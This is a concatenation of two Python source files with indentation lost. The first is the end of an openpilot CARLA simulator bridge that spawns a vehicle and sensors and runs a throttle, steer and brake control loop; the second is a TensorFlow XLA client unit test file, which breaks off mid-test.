spawn_point = spawn_points[self._args.num_selected_spawn_point]
vehicle = world.spawn_actor(vehicle_bp, spawn_point)
self._carla_objects.append(vehicle)
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
transform = carla.Transform(carla.Location(x=0.8, z=1.13))
def create_camera(fov, callback):
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', str(fov))
if not self._args.high_quality:
blueprint.set_attribute('enable_postprocess_effects', 'False')
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(callback)
return camera
self._camerad = Camerad()
road_camera = create_camera(fov=40, callback=self._camerad.cam_callback_road)
road_wide_camera = create_camera(fov=120, callback=self._camerad.cam_callback_wide_road) # fov bigger than 120 shows unwanted artifacts
self._carla_objects.extend([road_camera, road_wide_camera])
vehicle_state = VehicleState()
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(lambda imu: imu_callback(imu, vehicle_state))
gps_bp = blueprint_library.find('sensor.other.gnss')
gps = world.spawn_actor(gps_bp, transform, attach_to=vehicle)
gps.listen(lambda gps: gps_callback(gps, vehicle_state))
self._carla_objects.extend([imu, gps])
# launch fake car threads
self._threads.append(threading.Thread(target=panda_state_function, args=(vehicle_state, self._exit_event,)))
self._threads.append(threading.Thread(target=peripheral_state_function, args=(self._exit_event,)))
self._threads.append(threading.Thread(target=fake_driver_monitoring, args=(self._exit_event,)))
self._threads.append(threading.Thread(target=can_function_runner, args=(vehicle_state, self._exit_event,)))
for t in self._threads:
t.start()
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0.
throttle_op = steer_op = brake_op = 0.
throttle_manual = steer_manual = brake_manual = 0.
old_steer = old_brake = old_throttle = 0.
throttle_manual_multiplier = 0.7 # keyboard signal is always 1
brake_manual_multiplier = 0.7 # keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO # keyboard signal is always 1
# Simulation tends to be slow in the initial steps. This prevents lagging later
for _ in range(20):
world.tick()
# loop
rk = Ratekeeper(100, print_delay_threshold=0.05)
while self._keep_alive:
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0.0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0.0
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "reverse":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
elif m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
elif m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "ignition":
vehicle_state.ignition = not vehicle_state.ignition
elif m[0] == "quit":
break
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
if is_openpilot_engaged:
sm.update(0)
# TODO gas and brake is deprecated
throttle_op = clip(sm['carControl'].actuators.accel / 1.6, 0.0, 1.0)
brake_op = clip(-sm['carControl'].actuators.accel / 4.0, 0.0, 1.0)
steer_op = sm['carControl'].actuators.steeringAngleDeg
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
else:
if throttle_out == 0 and old_throttle > 0:
if throttle_ease_out_counter > 0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out == 0 and old_brake > 0:
if brake_ease_out_counter > 0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out == 0 and old_steer != 0:
if steer_ease_out_counter > 0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1, 1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
vc.throttle = throttle_out / 0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x ** 2 + vel.y ** 2 + vel.z ** 2) # in m/s
vehicle_state.speed = speed
vehicle_state.vel = vel
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
if rk.frame % PRINT_DECIMATION == 0:
print("frame: ", "engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "; steer(c/deg): ",
round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3))
if rk.frame % 5 == 0:
world.tick()
rk.keep_time()
self.started = True
def close(self):
self.started = False
self._exit_event.set()
for s in self._carla_objects:
try:
s.destroy()
except Exception as e:
print("Failed to destroy carla object", e)
for t in reversed(self._threads):
t.join()
def run(self, queue, retries=-1):
bridge_p = Process(target=self.bridge_keep_alive, args=(queue, retries), daemon=True)
bridge_p.start()
return bridge_p
if __name__ == "__main__":
q: Any = Queue()
args = parse_args()
carla_bridge = CarlaBridge(args)
p = carla_bridge.run(q)
if args.joystick:
# start input poll for joystick
from tools.sim.lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
else:
# start input poll for keyboard
from tools.sim.lib.keyboard_ctrl import keyboard_poll_thread
keyboard_poll_thread(q)
p.join()
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.Execute(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_allclose, c, arguments,
expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_py(arg) for arg in arguments]
result_buffer = compiled_c.ExecuteWithLocalBuffers(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_py(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.ExecuteWithLocalBuffers([arg_buffer])
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().Execute()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
